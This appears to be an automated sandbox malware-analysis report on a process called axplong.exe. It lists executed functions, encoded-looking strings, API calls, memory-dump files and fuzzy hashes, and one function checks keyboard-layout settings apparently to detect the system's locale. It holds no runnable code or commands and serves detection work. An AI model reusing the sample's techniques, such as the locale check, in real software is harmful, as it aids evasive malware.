Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2098694895.0000000005200000.00000040.00001000.00020000.00000000.sdmp, Offset: 05200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5200000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8307fc9d21a4e859a5690deae3816fde3fb81e8d6643129feaa8fe44439bb96
Instruction ID: ec53a0126f761716c73cae62c9a2ef3119c92ea7db68335e2849f5281b66df4c
Opcode Fuzzy Hash: a8307fc9d21a4e859a5690deae3816fde3fb81e8d6643129feaa8fe44439bb96
Instruction Fuzzy Hash: 31F0F8EB1AE011BDB201C1432B5CBF6962FE9E66303B09427F403D5543D6C98B4D6531

Analysis Process: axplong.exePID: 7060, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	11.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	8.8%
Total number of Nodes:	1917
Total number of Limit Nodes:	109

Executed Functions

Function 009DE440 Relevance: 14.8, Strings: 11, Instructions: 1000
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

WWp=, xrefs: 009E04DA
#, xrefs: 009E0534
111, xrefs: 009DF6B0
WGt=, xrefs: 009DF62D, 009DF90A
MJB+, xrefs: 009DE734
246122658369, xrefs: 009DF647, 009DF924, 009E04F7, 009E08AA
MT==, xrefs: 009DE4A5
fed3aa, xrefs: 009DFA9E
UD==, xrefs: 009DEA1F, 009DEC66
WWt=, xrefs: 009E088D
GqKudSO2, xrefs: 009DE47F

Memory Dump Source

Source File: 00000006.00000002.4792704599.00000000009D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000006.00000002.4792178627.00000000009D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4792704599.0000000000A32000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4795540825.0000000000A39000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000A3B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000BBF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000C9A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CE1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4823170685.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4833765550.0000000000E7A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4834028730.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9d0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: #$111$246122658369$GqKudSO2$MJB+$MT==$UD==$WGt=$WWp=$WWt=$fed3aa
API String ID: 0-214772295
Opcode ID: ee49522bbbda8019038e21e7324255ba2fd48b32a407a3fcf8357919b7d08c67
Instruction ID: b177300cea6a24979a41b5deceb2e25f36376bbbffc2e3b46eed0e6d1f927938
Opcode Fuzzy Hash: ee49522bbbda8019038e21e7324255ba2fd48b32a407a3fcf8357919b7d08c67
Instruction Fuzzy Hash: 3782F770904288EBEF15EF68C9497DDBFB5AB46304F508199E8056B3C2C7759A88CFD2

Function 009ED312 Relevance: .2, Instructions: 172
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___std_exception_copy.LIBVCRUNTIME ref: 009D247E

Memory Dump Source

Source File: 00000006.00000002.4792704599.00000000009D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000006.00000002.4792178627.00000000009D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4792704599.0000000000A32000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4795540825.0000000000A39000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000A3B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000BBF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000C9A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CE1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4823170685.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4833765550.0000000000E7A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4834028730.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9d0000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: 5877a38136cd96a34316e06673a4ee4bdb8612410f3b2dbf9ba2913fbe57195b
Instruction ID: e8d1d2d555dc4255664feeeef14b0f6d8a79947a6b79c34d8418144d30784c2e
Opcode Fuzzy Hash: 5877a38136cd96a34316e06673a4ee4bdb8612410f3b2dbf9ba2913fbe57195b
Instruction Fuzzy Hash: D851ACB1E016459FDB1ACFAAED857A9BBF8FB08350F24852AE404EB690D3749D41CF50

Function 052A0CBF Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4921013041.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_52a0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97d644fede0127c514473360b9fdd5a377d4c30e95688c4f57fa945b48911caf
Instruction ID: 01fed7268a12fc7981c4a2badeb3f5af7f586f4db384491775280cfe6ee8414e
Opcode Fuzzy Hash: 97d644fede0127c514473360b9fdd5a377d4c30e95688c4f57fa945b48911caf
Instruction Fuzzy Hash: 54F050BB53C9C0BFB747C4906B1CD7E6BEBEDD8320334445BF442C6002CE4559468222

Function 009E3550 Relevance: 51.5, APIs: 1, Strings: 28, Instructions: 761
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Xinvalid_argument.LIBCPMT ref: 009E425F

Part of subcall function 009E7870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 009E795C
Part of subcall function 009E7870: __Cnd_destroy_in_situ.LIBCPMT ref: 009E7968
Part of subcall function 009E7870: __Mtx_destroy_in_situ.LIBCPMT ref: 009E7971

Strings

6F9fr==, xrefs: 009E4712
MJB+, xrefs: 009E4776, 009E47ED, 009E4A95, 009E4B0C
mP=, xrefs: 009E6383
WJms, xrefs: 009E3BD9
5120, xrefs: 009E3ABF, 009E3BAA
aqB6, xrefs: 009E54DB
stoi argument out of range, xrefs: 009E2E02, 009E4269, 009E4EAC
8ZF6, xrefs: 009E5502
W07l, xrefs: 009E3AEE
Fz==, xrefs: 009E369E, 009E4D2D
V0x6, xrefs: 009E541E
KFT0PL==, xrefs: 009E54B9
HBhr, xrefs: 009E378F
246122658369, xrefs: 009E1EA5, 009E27EE, 009E2A43, 009E2AB0, 009E2E88, 009E3373, 009E33D4, 009E4F3A, 009E4F4D, 009E4F8F, 009E4F99, 009E54F4
WJP6, xrefs: 009E53A3
9KN6, xrefs: 009E5351
fed3aa, xrefs: 009E5489
V0N6, xrefs: 009E537A
JB6, xrefs: 009E53F5
5F6, xrefs: 009E5497
Vp 6, xrefs: 009E5447
invalid stoi argument, xrefs: 009E2DE9, 009E2DF8, 009E425A, 009E4E9D
V5Qk, xrefs: 009E3DC0
", xrefs: 009E3E99
MJF+, xrefs: 009E47BD, 009E48EC, 009E4ADC, 009E4C0B
9526, xrefs: 009E531D
96B6, xrefs: 009E5470
aZT6, xrefs: 009E53CC

Memory Dump Source

Source File: 00000006.00000002.4792704599.00000000009D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000006.00000002.4792178627.00000000009D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4792704599.0000000000A32000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4795540825.0000000000A39000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000A3B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000BBF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000C9A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CE1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4823170685.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4833765550.0000000000E7A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4834028730.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9d0000_axplong.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situXinvalid_argumentstd::_
String ID: 5F6$ 6F9fr==$ JB6$ mP=$"$246122658369$5120$8ZF6$9526$96B6$9KN6$Fz==$HBhr$KFT0PL==$MJB+$MJF+$V0N6$V0x6$V5Qk$Vp 6$W07l$WJP6$WJms$aZT6$aqB6$fed3aa$invalid stoi argument$stoi argument out of range
API String ID: 4234742559-3875209911
Opcode ID: fedc21f7ee9bd014938f97ccc77549840fd250ca4542bd6b3570a1059cf3134c
Instruction ID: a9a83b1b8590e08a1022ac23d0b4ae88a0c468519b3cba9ebed8249e1ae3c9a1
Opcode Fuzzy Hash: fedc21f7ee9bd014938f97ccc77549840fd250ca4542bd6b3570a1059cf3134c
Instruction Fuzzy Hash: F8521771A00288EBDF19EF79CD4A79DBB75AF85300F508198E445A7382D7359F84CBA2

Function 009D5DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

00000422, xrefs: 009D5FD9
Keyboard Layout\Preload, xrefs: 009D5F64
00000419, xrefs: 009D5FA8
00000423, xrefs: 009D600A
0000043f, xrefs: 009D603B

Memory Dump Source

Source File: 00000006.00000002.4792704599.00000000009D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000006.00000002.4792178627.00000000009D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4792704599.0000000000A32000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4795540825.0000000000A39000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000A3B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000BBF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000C9A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CE1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4823170685.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4833765550.0000000000E7A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4834028730.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9d0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: abbbe37a93f4807cffc1b2e6696ab3aaf49b2226aa1d721f25f91a433063dd7a
Instruction ID: 373bf04964018ab759af37af5deaf891c40581934ed7acdc9a8f288775c020f9
Opcode Fuzzy Hash: abbbe37a93f4807cffc1b2e6696ab3aaf49b2226aa1d721f25f91a433063dd7a
Instruction Fuzzy Hash: EAE19071940258ABEB25DFA4CC89BDEB779AF05304F5082DAE408A7291DB74AFC4CF51

Function 009D7D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?), ref: 009D7EA3

Strings

JmpxRL==, xrefs: 009D8062
JmpyPb==, xrefs: 009D810A
JmpxQb==, xrefs: 009D81B2

Memory Dump Source

Source File: 00000006.00000002.4792704599.00000000009D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000006.00000002.4792178627.00000000009D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4792704599.0000000000A32000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4795540825.0000000000A39000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000A3B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000BBF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000C9A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CE1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4823170685.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4833765550.0000000000E7A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4834028730.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9d0000_axplong.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: JmpxQb==$JmpxRL==$JmpyPb==
API String ID: 1721193555-2057465332
Opcode ID: 1894ac5ad49d7612608896a757f8d9c2e3934f0446f980c5987d1b638c5b15bb
Instruction ID: 049eb0ba16dfebb107318829a4ba78c3f1a3e29c639d24f53ddaca9fdeeb1983
Opcode Fuzzy Hash: 1894ac5ad49d7612608896a757f8d9c2e3934f0446f980c5987d1b638c5b15bb
Instruction Fuzzy Hash: 1AD11A71E44644ABDF14FB68DC4B39EB771AB82310F54828EE415AB3D2DB354E818BD2

Function 00A06E01 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNEL32(?,?,00000000,00000000), ref: 00A06E23
GetFileInformationByHandle.KERNEL32(?,?), ref: 00A06E7D
__dosmaperr.LIBCMT ref: 00A06F12

Part of subcall function 00A07177: __dosmaperr.LIBCMT ref: 00A071AC

Memory Dump Source

Source File: 00000006.00000002.4792704599.00000000009D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000006.00000002.4792178627.00000000009D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4792704599.0000000000A32000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4795540825.0000000000A39000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000A3B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000BBF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000C9A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CE1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4823170685.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4833765550.0000000000E7A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4834028730.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9d0000_axplong.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$HandleInformationType
String ID:
API String ID: 2531987475-0
Opcode ID: fe1f78eb570fd735314baf7956fe9fcb7271baa9df60ade4100c5d6737da8305
Instruction ID: f680fc353a30718a88d71d4e89f798538110c3a92016ea1c552cebcbd66a1277
Opcode Fuzzy Hash: fe1f78eb570fd735314baf7956fe9fcb7271baa9df60ade4100c5d6737da8305
Instruction Fuzzy Hash: 05418D75900209ABDB24EFB5ED459AFBBF9EF88304B10442DF556D3290EA31A914CB20

Function 00A06C99 Relevance: 3.1, APIs: 2, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.4792704599.00000000009D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000006.00000002.4792178627.00000000009D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4792704599.0000000000A32000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4795540825.0000000000A39000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000A3B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000BBF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000C9A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CE1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4823170685.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4833765550.0000000000E7A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4834028730.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9d0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fb9cdc25558d2512212a6eaec5cfb10bb9c1533b7920da7141455f0f00ff66b
Instruction ID: fbfa4c26c05a6b5f7dcb691477f8152ac9015bf4cf5bdf67c56f143be4765817
Opcode Fuzzy Hash: 6fb9cdc25558d2512212a6eaec5cfb10bb9c1533b7920da7141455f0f00ff66b
Instruction Fuzzy Hash: E921F272A0160C7AEB11BF64BD42B9F37299F4233CF200311F9243B1D1DB71AE1596A1

Function 009D82B0 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?), ref: 009D8454

Memory Dump Source

Source File: 00000006.00000002.4792704599.00000000009D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000006.00000002.4792178627.00000000009D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4792704599.0000000000A32000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4795540825.0000000000A39000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000A3B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000BBF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000C9A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CE1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4823170685.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4833765550.0000000000E7A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4834028730.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9d0000_axplong.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 9b8c097c4894f2e85ceb4fb41033f834c8192404941376908d4eca8e899906ea
Instruction ID: c211f45031e6f0f91afa155f88ddc90d3e8f904c7dc6378ebef107e84c51afb4
Opcode Fuzzy Hash: 9b8c097c4894f2e85ceb4fb41033f834c8192404941376908d4eca8e899906ea
Instruction Fuzzy Hash: D1514970D40219ABDB14EF68DD497EEB775EF45300F50829AE808A73D2EF345E808BA1

Function 00A06F71 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00A06FB3

Memory Dump Source

Source File: 00000006.00000002.4792704599.00000000009D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000006.00000002.4792178627.00000000009D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4792704599.0000000000A32000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4795540825.0000000000A39000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000A3B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000BBF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000C9A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CE1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4823170685.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4833765550.0000000000E7A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4834028730.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9d0000_axplong.jbxd

Yara matches

Similarity

API ID: Time$LocalSpecificSystem
String ID:
API String ID: 2574697306-0
Opcode ID: 23fdd2bdf090871dc81fbc5aecbbe447f3ea4d7fb383d166128207ee9f94728b
Instruction ID: f8df1b4652bb3b24c8c8d71da4a9095a7a0952959b620be232d73fcd6eccd039
Opcode Fuzzy Hash: 23fdd2bdf090871dc81fbc5aecbbe447f3ea4d7fb383d166128207ee9f94728b
Instruction Fuzzy Hash: 4211DAB290020DABCB14EB95E954EDFB7BCAF48314F505266E512E6180EB30EB548B61

Function 00A0AF0B Relevance: 1.5, APIs: 1, Instructions: 33
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,44ADEEF3,?,?,009ED32C,44ADEEF3,?,009E78FB,?,?,?,?,?,?,009D7435,?), ref: 00A0AF3E

Memory Dump Source

Source File: 00000006.00000002.4792704599.00000000009D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000006.00000002.4792178627.00000000009D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4792704599.0000000000A32000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4795540825.0000000000A39000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000A3B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000BBF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000C9A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CE1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4823170685.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4833765550.0000000000E7A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4834028730.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9d0000_axplong.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c45ba7b8c868d4df8c5d8a9aac0c2baee612bfa673e9415bd8cd8bf53c2d4b47
Instruction ID: b6fb4f87961e02657c093988cb74a32af65f787e855f4a2b410fc846722570db
Opcode Fuzzy Hash: c45ba7b8c868d4df8c5d8a9aac0c2baee612bfa673e9415bd8cd8bf53c2d4b47
Instruction Fuzzy Hash: C6E02B72A0A32F6AEB6033657D0176B358C8F623B1F054050AC05920C1CFA4CC0042E7

Function 052A0C41 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4921013041.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_52a0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9c389a6706da3f5a4da694279720660fd06becfe3114a0bad6a4fbb278465d9
Instruction ID: e6b1753ae3a495b0b7ae8d39fac758f87f4a80dedab76ac8e475293a918e15ed
Opcode Fuzzy Hash: e9c389a6706da3f5a4da694279720660fd06becfe3114a0bad6a4fbb278465d9
Instruction Fuzzy Hash: F61177BB16C250BFB241C5466F18AFA67AFEAD6730731882EF407C2506E3A54A4A5531

Function 052A0C38 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4921013041.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_52a0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cb6aed1a9e25d9f88908649e105096b4148dc13cadc50eb47db69dffaad299c
Instruction ID: 339445374796d063d37f2c65d65fd8bd94c81e56d5649cb827b1d5d06f217724
Opcode Fuzzy Hash: 6cb6aed1a9e25d9f88908649e105096b4148dc13cadc50eb47db69dffaad299c
Instruction Fuzzy Hash: 260121FB16C250BFB142C5466F18EFB6BAFE9D6730731842BF406C1506E3D54A495131

Function 052A0C57 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4921013041.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_52a0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de87bfba2d53d76f0fb0b317ce890b7b6140bfa382c1cda57043ad37e28b3477
Instruction ID: ec25dcebf1e8ba742145b2eca0dec0c868ceabe860e1dc57395b1039c2179946
Opcode Fuzzy Hash: de87bfba2d53d76f0fb0b317ce890b7b6140bfa382c1cda57043ad37e28b3477
Instruction Fuzzy Hash: 59012DBB12C2547FB242C9826F149FB67AFE9C6730731842BF802C2102E7954A4D5131

Function 052A0C90 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4921013041.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_52a0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26a35a7d23b06e3e75063fb89b49a19fe8bda53dcddc5cf38a56beeec7607e64
Instruction ID: a380d99b0fb49992c9eb6de70cdcbf8dfc15f837ad4baaa509c1617ea93ab02e
